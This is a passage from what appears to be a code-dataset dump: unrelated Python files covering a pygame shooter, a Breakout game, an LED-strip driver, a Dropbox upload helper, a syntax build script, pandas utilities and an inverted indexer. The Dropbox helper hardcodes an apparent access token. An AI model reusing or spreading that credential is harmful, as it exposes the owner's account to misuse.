__init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.imageOriginal = random.choice(meteorImages)\n self.imageOriginal.set_colorkey(BLACK)\n self.image = self.imageOriginal.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width / 2)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-150, -100)\n self.speedY = random.randrange(5, 15)\n self.speedX = random.randrange(-3, 3)\n\n def update(self):\n self.rect.x += self.speedX\n self.rect.y += self.speedY\n if self.rect.top > HEIGHT + 10 or self.rect.left < -30 or self.rect.right > WIDTH + 30:\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-150, -100)\n self.speedY = random.randrange(5, 15)\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = bulletImg\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speed = -10\n\n def update(self):\n self.rect.y += self.speed\n # Eliminar el sprite si se sale de la pantalla\n if self.rect.bottom < 0:\n self.kill()\n\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosionAnimation[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.lastUpdate = pygame.time.get_ticks()\n self.frameCount = 50\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.lastUpdate > self.frameCount:\n self.lastUpdate = now\n self.frame += 1\n if self.frame == len(explosionAnimation[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosionAnimation[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n\n# Botones\nimgBotonJugar = pygame.image.load(os.path.join(assetsFolder, \"start.png\"))\nimgBotonHowToPlay = pygame.image.load(os.path.join(assetsFolder, \"howToPlay.png\"))\nimgBotonHighScore = pygame.image.load(os.path.join(assetsFolder, \"highScore.png\"))\n\nbtnJugar = pygame.sprite.Sprite() # SPRITE\nbtnJugar.image = imgBotonJugar\nbtnJugar.rect = imgBotonJugar.get_rect()\nbtnJugar.rect.left = WIDTH / 2 - btnJugar.rect.width / 2 # coordenada x\nbtnJugar.rect.top = HEIGHT / 2 - btnJugar.rect.height / 2 # coordenada y\n\nbtnHighScore = pygame.sprite.Sprite()\nbtnHighScore.image = imgBotonHighScore\nbtnHighScore.rect = imgBotonHighScore.get_rect()\nbtnJugar.rect.left = WIDTH / 2 - btnJugar.rect.width / 2 # coordenada x\nbtnJugar.rect.top = HEIGHT / 2 - btnJugar.rect.height / 2 + 5# coordenada y\n\nbtnHowToPlay = pygame.sprite.Sprite()\nbtnHowToPlay.image = imgBotonHowToPlay\nbtnHowToPlay.rect = imgBotonHowToPlay.get_rect()\nbtnJugar.rect.left = WIDTH / 2 - btnJugar.rect.width / 2 # coordenada x\nbtnJugar.rect.top = HEIGHT / 2 - btnJugar.rect.height / 2 + 10 # coordenada y\n\n# Iniciar Pygame y crear la ventana del juego\npygame.init()\npygame.mixer.init()\nventana = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Game\")\nclock = pygame.time.Clock()\n\n# Cargar gráficos del juego\nbg = pygame.image.load(os.path.join(assetsFolder, \"corona_rt.png\")).convert()\nbgRect = bg.get_rect()\nnaveImg = pygame.image.load(os.path.join(assetsFolder, \"playerShip1_red.png\")).convert()\nnaveVidaImg = pygame.image.load(os.path.join(assetsFolder, \"playerLife1_red.png\")).convert()\nnaveVidaImg.set_colorkey(BLACK)\nmeteorImages = 
[]\nmeteorList = ['meteorBrown_big1.png', 'meteorBrown_big2.png', 'meteorBrown_big3.png', 'meteorBrown_big4.png',\n 'meteorBrown_med1.png', 'meteorBrown_med3.png', 'meteorBrown_small1.png', 'meteorBrown_small2.png',\n 'meteorBrown_tiny1.png', 'meteorBrown_tiny2.png']\nfor img in meteorList:\n meteorImages.append(pygame.image.load(os.path.join(assetsFolder, img)))\nbulletImg = pygame.image.load(os.path.join(assetsFolder, \"laserBlue16.png\")).convert()\n# En el siguiente diccionario se van a agregar dos tamaños de explociones para llamarlas individualmente\n# según el tamaño que corresponde al Sprite\nexplosionAnimation = {}\nexplosionAnimation['lg'] = []\nexplosionAnimation['sm'] = []\nfor f in range(9):\n filename = 'regularExplosion0{}.png'.format(f)\n img = pygame.image.load(os.path.join(assetsFolder, filename)).convert()\n img.set_colorkey(BLACK)\n imgLarge = pygame.transform.scale(img, (80, 80))\n explosionAnimation['lg'].append(imgLarge)\n imgSmall = pygame.transform.scale(img, (32, 32))\n explosionAnimation['sm'].append(imgSmall)\nshieldImg = pygame.image.load(os.path.join(assetsFolder, \"shield.png\"))\n\n# Cargar sonidos del juego\nshootSound = pygame.mixer.Sound(os.path.join(musicFolder, \"laser1.wav\"))\nexplotionSounds = [pygame.mixer.Sound(os.path.join(musicFolder, \"explosion1.wav\")),\n pygame.mixer.Sound(os.path.join(musicFolder, \"explosion2.wav\"))]\n\nnaveDestruidaSound = pygame.mixer.Sound(os.path.join(musicFolder, \"playerDead.wav\"))\n# Musica de fondo\npygame.mixer.music.load(os.path.join(musicFolder, \"Notathing2.mp3\"))\npygame.mixer.music.set_volume(0.4)\n# Tocar música de fondo\npygame.mixer.music.play(loops=-1)\n# Agrupar Sprites para agregarlos facilmente al juego\nallSprites = pygame.sprite.Group()\n# Mobs group\nmobs = pygame.sprite.Group()\n# Bullets Gorup\nbullets = pygame.sprite.Group()\nplayer = Player()\nallSprites.add(player)\nfor i in range(8):\n nuevoMeteorito()\n# Puntos acumulados del juego\nscore = 0\n\n\ndef dibujar(score):\n # Loop del Juego\n menu = True\n running = True\n while running:\n if menu:\n inicioJuego()\n menu = False\n # Mantener el loop corriendo a la velocidad requerida\n clock.tick(FPS)\n # Eventos - Procesos\n for event in pygame.event.get():\n # Revisar si se cerró la ventana del juego\n if event.type == pygame.QUIT:\n running = False\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n player.shoot()\n\n # Actualizar\n allSprites.update()\n\n # Revisa si una bala se impacta con algún enemigo(mob)\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n for hit in hits:\n score += 100 - hit.radius\n random.choice(explotionSounds).play()\n explosion = Explosion(hit.rect.center, 'lg')\n allSprites.add(explosion)\n nuevoMeteorito()\n\n # Revisa si algún enemigo(mob) choca con el Sprite Player\n hits = pygame.sprite.spritecollide(player, mobs, True, pygame.sprite.collide_circle)\n for hit in hits:\n player.shield -= hit.radius\n random.choice(explotionSounds).play()\n explosion = Explosion(hit.rect.center, 'sm')\n allSprites.add(explosion)\n nuevoMeteorito()\n if player.shield <= 0:\n naveDestruidaSound.play()\n naveDestruida = Explosion(player.rect.center, 'lg')\n allSprites.add(naveDestruida)\n player.ocultar()\n player.vidas -= 1\n player.shield = 100\n\n # Si se destruye la nave y la explosión termino\n if player.vidas == 0 and not naveDestruida.alive():\n gameOver(score)\n\n # Renedr / Draw\n ventana.fill(BLACK)\n ventana.blit(bg, bgRect)\n allSprites.draw(ventana)\n dibujarBarraEscudo(ventana, 30, 
10, player.shield)\n typeText(ventana, str(player.shield), 14, 150, 8)\n typeText(ventana, str(score), 18, WIDTH / 2, 10)\n mostrarVidas(ventana, WIDTH - 120, 10, player.vidas, naveVidaImg)\n # After drawing flip the new slide\n pygame.display.flip()\n pygame.quit()\n\n\ndef main():\n preguntarNombre()\n dibujar(score)\n\n\nmain()\n","repo_name":"CarlosMtz98/ProyectoFinal","sub_path":"Space.py","file_name":"Space.py","file_ext":"py","file_size_in_byte":13212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27394610398","text":"import dropbox\r\n\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n\r\n def upload_file(self, file_from, file_to):\r\n \"\"\"upload a file to Dropbox using API v2\r\n \"\"\"\r\n dbx = dropbox.Dropbox(self.access_token)\r\n\r\n with open(file_from, 'rb') as f:\r\n dbx.files_upload(f.read(), file_to)\r\n\r\ndef main():\r\n access_token = 'sl.A2yrr7U2bH6CmEHP072nInY-MqBSWneYi-Iv6hlp-wyQWgbfjsglax7pZJVmlRlA5G3W6b221PlP3yHKT-dhqU0UIDqahY_UZWuakOX9_0oCUF-erwiWVmN_20GEHgdFEvX2Qvw'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = '/Users/HP_BOOK_PRO/Desktop/c-101/test.txt'\r\n file_to = '/Users/HP_BOOK_PRO/Dropbox/test.txt' # The full path to upload the file to, including the file name\r\n\r\n # API v2\r\n transferData.upload_file(file_from, file_to)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"akku3012/c101","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29954287875","text":"from os.path import join\n\n# Module level constants\nCURRENT_DIR = '.'\nLANG_PATH = join(CURRENT_DIR, 'lang')\n\n# Import cutils modules\ntry:\n import cutils.ccom\n import cutils.clic\n import cutils.cver\n\n # Update version\n cutils.cver.version(CURRENT_DIR, sub_max=9, rev_max=99, build_max=999)\n # Collect all special comments\n cutils.ccom.collect(CURRENT_DIR)\n # Update header comments\n cutils.clic.header(CURRENT_DIR)\nexcept ImportError:\n print('[WARNING] cutils modules are missing: '\n 'install it from http://www.cutils.org')\n\n# Import tmtools modules\ntry:\n from tmtools.convert import Language\nexcept ImportError:\n from sys import exit\n print('[ ERROR ] tmtools modules are missing: '\n 'install it from http://github.com/petervaro/tmtools')\n exit(-1)\n\n#------------------------------------------------------------------------------#\n# Import user modules\nfrom src.rust import syntax\n\n# I/O Details of languages and themes\ndetails = {'name' : 'Rusty',\n 'path' : LANG_PATH,\n 'scope': 'rs',\n 'comments' : {'lines': '//',\n 'blocks': ('/*', '*/')},\n 'buildsys' : {'build': 'cargo build',\n 'run': 'cargo run',\n 'rebuild': 'cargo clean && cargo build',\n 'rebuild_and_run': 'cargo clean && cargo run'},\n 'test_name': 'Rusty_TEST',\n 'test_path': '~/Library/Application Support/Sublime Text 3/'\n 'Packages/User/Rusty_TEST'}\n\n# NOTE: Old path to theme files => DO NOT SUPPORT IT:\n# '~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default'\n\n#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #\n# Setup names and locations\nlang = Language(**details)\n# Convert and save language 
file\nlang.from_dict(syntax)\nlang.write()\n","repo_name":"petervaro/rust","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"17560449125","text":"'''\nAuthor: Georden Grabuskie ggrabuskie@csu.fullerton.edu\nDriving ws2812 LED light strip from an SPI bus.\n\nThis code operates by syncing sent data to match the expected input\ntiming of the ws2812 LED light strips.\nUses the FT232H breakout board to add SPI capability using an open\nUSB port.\n\nAll base code taken directly from \nhttps://learn.adafruit.com/adafruit-ft232h-breakout/spi\n'''\n\nfrom time import sleep\nimport Adafruit_GPIO as GPIO\nimport Adafruit_GPIO.FT232H as FT232H\n#tuples to be used as operands\nOFF = (0, 0, 0) #light OFF\nRED = (255, 0, 0) #AUX POWER\nORANGE = (255, 75, 0) #MOBILITY + ARM/SCIENCE MODULE MODE\nYELLOW = (240, 255, 0) #MOBILITY ONLY MODE\nGREEN = (0, 255, 0) #ALL_ON\nBLUE_GREEN = (10, 255, 255) # Ebyte 433 MHZ COMM MODE\nBLUE = (0, 0, 255) #Ubiquiti 3.4 GHZ COMM MODE\nPURPLE = (255, 0, 127) #Attached MODULE MODE\nWHITE = (255, 255, 255) #chase light\n\n# mode 0 = both, mode 1 = mobility, mode 2 = arm, mode 3 = arm Single(Not Mixed)\nAUX_COLOR = RED #auxillary power\nALL_COLOR = GREEN #auxillary and main power\nMOBILITY_COLOR = YELLOW #mobility only\nMODULE_COLOR = PURPLE #arm/science only\nFULL_CONTROL = ORANGE #both mobility and arm/science\nGHZ_COLOR = BLUE #ubiquity\nMHZ_COLOR = BLUE_GREEN #433 MHz backup radio\n\nmode = 1 #value will be pulled from subscribed topic \n\nclass Rover_Status_Lights(object):\n\n\tdef __init__(self, n):\n\t\t# Create an FT232H object.\n\t\tself.ft232h = FT232H.FT232H()\n\t\t# Create a SPI interface for the FT232H object. 
Set the SPI bus to 6mhz.\n\t\tself.spi = FT232H.SPI(self.ft232h, max_speed_hz=12800000)\n\t\t# Create a pixel data buffer and lookup table.\n\t\tself.buffer = bytearray(n*24)\n\t\tself.lookup = self.build_byte_lookup()\n\n\n\n\n\n\n\tdef build_byte_lookup(self):\n\t\t# Create a lookup table to map all byte values to 8 byte values which\n\t\t# represent the 6mhz SPI data to generate the NeoPixel signal for the\n\t\t# specified byte.\n\t\tlookup = {}\n\t\tfor i in range(256):\n\t\t\tvalue = bytearray()\n\t\t\tfor j in range(7, -1, -1):\n\t\t\t\tif ((i >> j) & 1) == 0:\n\t\t\t\t\tvalue.append(0b11100000)\n\t\t\t\telse:\n\t\t\t\t\tvalue.append(0b11111000)\n\t\t\tlookup[i] = value\n\t\treturn lookup\n\n\tdef setColor(self, n, r, g, b):\n\t\t# Set the pixel RGB color for the pixel at position n.\n\t\t# Assumes GRB NeoPixel color ordering, but it's easy to change below.\n\t\tindex = n*24\n\t\tself.buffer[index :index+8 ] = self.lookup[int(g)]\n\t\tself.buffer[index+8 :index+16] = self.lookup[int(r)]\n\t\tself.buffer[index+16:index+24] = self.lookup[int(b)]\n\n\tdef show(self):\n\t\t# Send the pixel buffer out the SPI data output pin (D1) as a NeoPixel\n\t\t# signal.\n\t\tself.spi.write(self.buffer)\n\n\tdef set_front(self, r, g, b):\n\t\tprint(r + g + b)\n\t\tfor i in range(0, 7):\n\t\t\tself.setColor(i, r, g, b) #front right\n\t\tfor i in range(53, 60):\n\t\t\tself.setColor(i, r, g, b) #front left\n\t\tself.show()\n\n\tdef set_front_chase(self, r, g, b):\n\t\tchaseL = 53 #start status for the front left lights\n\t\tchaseR = 7 #end status for the front right lights (order is reversed between sides)\n\t\twhile True:\t\t#cycle throught the front lights from rear to front changing between blue and orange\n\t\t\tfor i in range(7):\n\t\t\t\tself.setColor(chaseL + i, *WHITE) \n\t\t\t\tself.setColor(chaseR - i, *WHITE)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.05)\n\t\t\t\tself.setColor(chaseL + i, r, g, b) \n\t\t\t\tself.setColor(chaseR - i, r, g, b)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.02)\n\t\t\tsleep(.5)\n\n\tdef set_mid(self, r, g, b):\n\t\tfor i in range(7, 15):\n\t\t\tself.setColor(i, r, g, b) #middle front right\n\t\tfor i in range(45, 53):\n\t\t\tself.setColor(i, r, g, b) #middle front left\n\t\tself.show()\n\n\tdef set_rear(self, r, g, b):\n\t\tfor i in range(15, 30):\n\t\t\tself.setColor(i, *BLUE) #rear right\n\t\tfor i in range(30, 45):\n\t\t\tself.setColor(i, *ORANGE) #rear left\n\t\tself.show()\n\t\n\tdef set_all(self, r, g, b):\n\t\tfor i in range(0, 60):\n\t\t\tself.setColor(i, *OFF)\n\t\tself.show()\n\n\n\tdef idle(self):\n\t\tfor i in range (60):\n\t\t\tself.setColor(i, *WHITE)\n\t\tself.show()\n\t\tsleep(0.25)\n\n\t\twhile True:\t\t#cycle throught the front lights from rear to front changing between blue and orange\n\t\t\tchaseL = 30 #start status for the front left lights\n\t\t\tchaseR = 30 #end status for the front right lights (order is reversed between sides)\n\t\t\tfor i in range(31):\n\t\t\t\tself.setColor(chaseL + i, *BLUE) \n\t\t\t\tself.setColor(chaseR - i, *BLUE)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.03)\n\n\t\t\tsleep(.5)\n\t\t\tfor i in range(31): \t\t#repeat to swap colors back\n\t\t\t\tself.setColor(chaseL + i, *ORANGE) \n\t\t\t\tself.setColor(chaseR - i , *ORANGE)\n\t\t\t\tself.show()\n\t\t\t\tsleep(0.03)\n\n\t\t\tsleep(.5)\n\n\tdef test(self):\n\t\tprint(\"Test\")\n\t\t#All directions given from behind the rover.\n\t\tfor i in range(0, 59):\n\t\t\tself.setColor(i, *OFF) #refresh all\n\t\t\tself.show()\n\t\tsleep(0.25)\n\t\tfor i in range(0, 7):\n\t\t\tself.setColor(i, 
*RED) #front right\n\t\tfor i in range(7, 15):\n\t\t\tself.setColor(i, *ORANGE) #middle front right\n\t\tfor i in range(15, 23):\n\t\t\tself.setColor(i, *YELLOW) #middle rear right\n\t\tfor i in range(23, 30):\n\t\t\tself.setColor(i, *GREEN) #rear right sides\n\t\t\t\n\t\tfor i in range(30, 37):\n\t\t\tself.setColor(i, *BLUE_GREEN) #rear left\n\t\tfor i in range(37, 45):\n\t\t\tself.setColor(i, *BLUE) #middle rear left\n\t\tfor i in range(45, 53):\n\t\t\tself.setColor(i, *PURPLE) #middle front left\n\t\tfor i in range(53, 60):\n\t\t\tself.setColor(i, *WHITE) #front left\n\t\tself.show()\n\n\tdef update(self, mode):\n\n\t\tself.dispatch = {\n\t\t\t\t\t0 : (self.set_front_chase, FULL_CONTROL),\n\t\t\t\t\t1 : (self.set_front_chase, MOBILITY_COLOR),\n\t\t\t\t\t2 : (self.set_front_chase, MODULE_COLOR),\n\t\t\t\t\t\"aux\" : (self.set_mid, AUX_COLOR),\n\t\t\t\t\t\"all\" : (self.set_mid, ALL_COLOR),\n\t\t\t\t\t\"ghz\" : (self.set_rear, GHZ_COLOR),\n\t\t\t\t\t\"mhz\" : (self.set_rear, MHZ_COLOR)\n\t\t\t\t\t}\n\n\t\tself.dispatch[mode][0](*self.dispatch[mode][1])\n\n\n\n\n# Run this code when the script is called at the command line:\nif __name__ == '__main__':\n\t# Define the number of self in the NeoPixel strip.\n\t# Only up to ~340 self can be written using the FT232H.\n\tpixel_count = 60\n\t# Create a NeoPixel_FT232H object.\n\tstatus = Rover_Status_Lights(pixel_count)\n\tstatus.set_all(*OFF)\n\tstatus.update(mode)\n\t#status.set_front_chase(*RED)\n\n","repo_name":"ggrabuskie/leddy","sub_path":"ex.py","file_name":"ex.py","file_ext":"py","file_size_in_byte":5980,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2751555373","text":"\"\"\"\nstanCode Breakout Project\nAdapted from Eric Roberts's Breakout by\nSonja Johnson-Yu, Kylie Jue, Nick Bowman, \nand Jerry Liao\n\nYOUR DESCRIPTION HERE\n\"\"\"\nfrom campy.graphics.gwindow import GWindow\nfrom campy.graphics.gobjects import GOval, GRect\nfrom campy.gui.events.mouse import onmouseclicked, onmousemoved\nimport random\n\nBRICK_SPACING = 5 # Space between bricks (in pixels). 
This space is used for horizontal and vertical spacing.\nBRICK_WIDTH = 40 # Height of a brick (in pixels).\nBRICK_HEIGHT = 15 # Height of a brick (in pixels).\nBRICK_ROWS = 10 # Number of rows of bricks.\nBRICK_COLS = 10 # Number of columns of bricks.\nBRICK_OFFSET = 50 # Vertical offset of the topmost brick from the window top (in pixels).\nBALL_RADIUS = 10 # Radius of the ball (in pixels).\nPADDLE_WIDTH = 75 # Width of the paddle (in pixels).\nPADDLE_HEIGHT = 15 # Height of the paddle (in pixels).\nPADDLE_OFFSET = 50 # Vertical offset of the paddle from the window bottom (in pixels).\n\nINITIAL_Y_SPEED = 7 # Initial vertical speed for the ball.\nMAX_X_SPEED = 5 # Maximum initial horizontal speed for the ball.\n\n\nclass BreakoutGraphics:\n def __init__(self, ball_radius=BALL_RADIUS, paddle_width=PADDLE_WIDTH,\n paddle_height=PADDLE_HEIGHT, paddle_offset=PADDLE_OFFSET,\n brick_rows=BRICK_ROWS, brick_cols=BRICK_COLS,\n brick_width=BRICK_WIDTH, brick_height=BRICK_HEIGHT,\n brick_offset=BRICK_OFFSET, brick_spacing=BRICK_SPACING,\n title='Breakout', dx=MAX_X_SPEED, dy=INITIAL_Y_SPEED,):\n # Create a graphical window, with some extra space\n self.window_width = brick_cols * (brick_width + brick_spacing) - brick_spacing\n self.window_height = brick_offset + 3 * (brick_rows * (brick_height + brick_spacing) - brick_spacing)\n self.window = GWindow(width=self.window_width, height=self.window_height, title=title)\n # Create a paddle\n self.paddle_width = paddle_width\n self.paddle_height = paddle_height\n self.paddle_offset = paddle_offset\n self.paddle = GRect(width=self.paddle_width, height=self.paddle_height,\n x=(self.window_width-self.paddle_width)/2,\n y=self.window_height-self.paddle_offset)\n self.paddle.filled = True\n self.window.add(self.paddle)\n # Center a filled ball in the graphical window\n self.ball_radius = ball_radius\n self.ball = GOval(self.ball_radius*2, self.ball_radius*2, x=(self.window_width-self.ball_radius)/2,\n y=(self.window_height-self.ball_radius)/2)\n self.ball.filled = True\n self.window.add(self.ball)\n # Default initial velocity for the ball\n self.__dx = dx\n self.__dy = dy\n self.get_velocity_x()\n self.get_velocity_y()\n self.set_ball_velocity()\n # Draw bricks\n self.brick_rows = brick_rows\n self.brick_cols = brick_cols\n self.brick_width = brick_width\n self.brick_height = brick_height\n self.brick_offset = brick_offset\n self.brick_spacing = brick_spacing\n for row in range(self.brick_rows):\n for col in range(self.brick_cols):\n self.brick = GRect(width=self.brick_width, height=self.brick_height,\n x=(self.brick_width + self.brick_spacing) * col\n , y=self.brick_offset + (self.brick_height + self.brick_spacing) * row)\n self.brick.filled = True\n if row < 2:\n self.brick.fill_color = \"RED\"\n elif row == 2 or row == 3:\n self.brick.fill_color = \"ORANGE\"\n elif row == 4 or row == 5:\n self.brick.fill_color = \"YELLOW\"\n elif row == 6 or row == 7:\n self.brick.fill_color = \"GREEN\"\n else:\n self.brick.fill_color = \"BLUE\"\n self.window.add(self.brick)\n # Initialize our mouse listeners\n onmousemoved(self.paddle_move)\n onmouseclicked(self.handle_click)\n self.start = False\n # detect if ball hit other objects\n self.detect()\n\n def detect(self):\n obj = self.window.get_object_at(self.ball.x, self.ball.y)\n if self.window.get_object_at(self.ball.x, self.ball.y) is not None:\n return self.window.get_object_at(obj.x, obj.y)\n elif self.window.get_object_at(self.ball.x+2*self.ball_radius, self.ball.y) is not None:\n return 
self.window.get_object_at(self.ball.x+2*self.ball_radius, self.ball.y)\n elif self.window.get_object_at(self.ball.x, self.ball.y + 2 * self.ball_radius) is not None:\n return self.window.get_object_at(self.ball.x, self.ball.y + 2 * self.ball_radius)\n elif self.window.get_object_at(self.ball.x + 2 * self.ball_radius,\n self.ball.y + 2 * self.ball_radius) is not None:\n return self.window.get_object_at(self.ball.x + 2 * self.ball_radius,\n self.ball.y + 2 * self.ball_radius)\n else:\n return None\n\n def get_velocity_x(self):\n return self.__dx\n\n def get_velocity_y(self):\n return self.__dy\n\n def set_ball_velocity(self):\n self.__dx = random.randint(0, MAX_X_SPEED)\n if random.random() > 0.5:\n self.__dx = -self.__dx\n return self.__dx\n\n def paddle_move(self, m):\n if 0 - self.paddle_width <= m.x < self.window_width - self.paddle_width:\n self.window.add(self.paddle, x=(m.x + self.paddle_width) / 2,\n y=self.window_height - self.paddle_offset)\n elif m.x > self.window_width - self.paddle_width:\n self.window.add(self.paddle, x=self.window_width - self.paddle_width,\n y=self.window_height - self.paddle_offset)\n\n def handle_click(self, event):\n if not self.start:\n self.start = True\n","repo_name":"ozzyfly/StanCode_assignment","sub_path":"未命名檔案夾/breakoutgraphics.py","file_name":"breakoutgraphics.py","file_ext":"py","file_size_in_byte":6108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"18621718680","text":"import os\n\nimport pandas as pd\n\n\ndef convert(working_dir, filename, output_filename, sheet_name=0, rename='Unit ID'):\n read_file = pd.read_excel(os.path.join(working_dir, filename), sheet_name=sheet_name)\n read_file = read_file.rename(columns={rename: 'unit_id'})\n read_file.to_csv(os.path.join(working_dir, output_filename), index=None, header=True)\n\n\ndef convert_delete(working_dir, filename, output_filename, sheet_name=0):\n convert(working_dir, filename, output_filename, sheet_name=sheet_name)\n os.remove(os.path.join(working_dir, filename))\n\n\ndef count(file, working_dir):\n huge_filename = os.path.join(working_dir, file)\n dfs = pd.read_csv(huge_filename, chunksize=100000)\n pd.set_option('max_columns', None)\n counter = 0\n for df in dfs:\n counter += df.size\n print(\"now:\", counter)\n#\n# technology_count_df = source_df[[\"Technology\"]].value_counts().reset_index(name='num_probes')\n# print(technology_count_df)\n#\n# state_count_df = source_df[[\"State\"]].value_counts().reset_index(name='num_probes')\n# print(state_count_df)\n\n# census_count_df = source_df[[\"Census\"]].value_counts().reset_index(name='num_probes')\n# print(census_count_df)\n\n# cc = df_probes[[\"unit_id\"]].apply(to_technology, axis=1, result_type='expand')\n# def to_technology(series):\n# print(series, type(series), series['unit_id'], type(series['unit_id']))\n# search = df_unit_profile[df_unit_profile['unit_id'] == series['unit_id']]\n# print(search.size)\n# return search[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]].values[0]\n#\n#\n# # ser_to = pd.Series({\"kkk\": 27681})\n# ser_to = to_technology(pd.Series({\"unit_id\": 458}))\n# print(ser_to, type(ser_to))\n\n# df_probes[\"unit_id\"], df_probes[\"ISP\"], df_probes[\"Technology\"], df_probes[\"State\"], df_probes[\n# \"Census\"] = to_technology(df_probes[\"unit_id\"])\n# ser = df_probes.iloc[:, 0]\n# print(ser, type(ser))\n# df_probes[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]] = df_probes.iloc[:, 0].map(to_technology, axis=1)\n# 
print(df_probes)\n# cc = df_probes.iloc[:, 0].map(df_unit_profile.set_index('unit_id')[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]])\n# print(cc)\n# cc = df_probes[\"unit_id\"].map(dict(df_unit_profile[[\"unit_id\", \"ISP\", \"Technology\", \"State\", \"Census\"]].values[0]))\n# print(cc)\n","repo_name":"sstshenshutao/internetmeasureexe2","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"27235741594","text":"import json\n\n# global variables\nFOLDER_NAME = 'downloaded-files/' # location to download the textual files\nfilenames = [] # stores the name of all the files created\n\n\n'''\n Given: a file name and list to store the unique crawled links\n Effect: populates the given list with the links extracted from the given file name.\n'''\ndef get_crawled_links(file_name, crawled_links):\n with open(file_name, 'r') as file: # open file\n line = file.readlines()\n crawled_links.extend([FOLDER_NAME + l.strip().split('/wiki/')[-1] + '.txt' for l in line]) # generate file names\n\n'''\n Given: a file name\n Returns: a list of all the words in the given file\n'''\ndef read_text(file_name):\n terms = [] # list of all terms\n with open(file_name, 'r') as file: # open file\n line = file.readlines()\n for l in line:\n terms += l.strip().split() # get each term\n return terms\n\n'''\n Given: a list of terms and an integer n\n Returns: a list of all the n-grams in the given list\n'''\ndef get_ngrams(terms, n):\n ngrams = [] # n-gram list\n for i in range(0, len(terms)):\n ngrams.append(' '.join(terms[i : i + n])) # generate n-grams using join\n return ngrams\n\n'''\n Given: a list of file names and an integer n\n Returns: a dictionary where keys are terms and values are dictionaries\n that contain document ID to total term count mapping\n'''\ndef tf_inverted_indexer(file_list, n):\n term_tf = {} # dict with terms as keys\n for file in file_list:\n doc_id = file.split('.txt')[0].split('/')[-1] # make doc ID\n terms = read_text(file) # all terms in the file\n ngrams = get_ngrams(terms, n) # list of n-grams in that file\n for gram in ngrams:\n if gram in term_tf: # if term has been added to dict\n if doc_id in term_tf[gram]: # if document ID has been added to value dict\n term_tf[gram][doc_id] += 1 # increase term count by 1\n else:\n term_tf[gram][doc_id] = 1 # if new document ID is seen, create key of document ID\n else:\n term_tf[gram] = {} # create value dict\n term_tf[gram][doc_id] = 1 # add key of document ID and initial term count\n return term_tf\n\n'''\n Given: a list of file names and an integer n\n Returns: a dictionary where keys are terms and values are dictionaries\n that contain document ID to list of term positions mapping\n'''\ndef tp_inverted_indexer(file_list, n):\n term_tp = {} # dict with terms as keys\n for file in file_list:\n doc_id = file.split('.txt')[0].split('/')[-1] # make doc ID\n terms = read_text(file) # all terms in the file\n ngrams = get_ngrams(terms, n) # list of n-grams in that file\n for i in range(len(ngrams)):\n pos = i + 1 # position of the term in the document\n if ngrams[i] in term_tp: # if term has been added to dict\n if doc_id in term_tp[ngrams[i]]: # if document ID has been added to value dict\n term_tp[ngrams[i]][doc_id].append(pos) # append position to position list\n else:\n term_tp[ngrams[i]][doc_id] = [pos] # if new document ID is seen, create key of document ID\n else:\n term_tp[ngrams[i]] = 
{} # create value dict\n term_tp[ngrams[i]][doc_id] = [pos] # add key of document ID and initial term position\n return term_tp\n\n'''\n Given: a dictionary and a file name\n Effect: writes the inverted index with term frequencies to a txt file\n in the format term -> (docID, tf)\n'''\ndef write_term_frequencies(ttf, file_name):\n with open(file_name, 'w', encoding='utf-8') as outfile:\n for t in ttf:\n outfile.write(\"%s\\t->\\t\" %t)\n for d in ttf[t]:\n outfile.write(\"(%s,\\t\" % d)\n outfile.write(\"%s)\\t\" % ttf[t][d])\n outfile.write(\"\\n\")\n\n'''\n Given: a dictionary and a filename\n Effect: writes the inverted index with term positions to a txt file\n in the format term -> (docID, pos1,pos2,...)\n'''\ndef write_term_positions(ttp, file_name):\n with open(file_name, 'w', encoding='utf-8') as outfile:\n for t in ttp:\n outfile.write(\"%s\\t->\\t\" %t)\n for d in ttp[t]:\n outfile.write(\"(%s\\t\" %d)\n for pos in range(len(ttp[t][d])):\n if pos == len(ttp[t][d]) - 1:\n outfile.write(\"%s\" %ttp[t][d][pos])\n else:\n 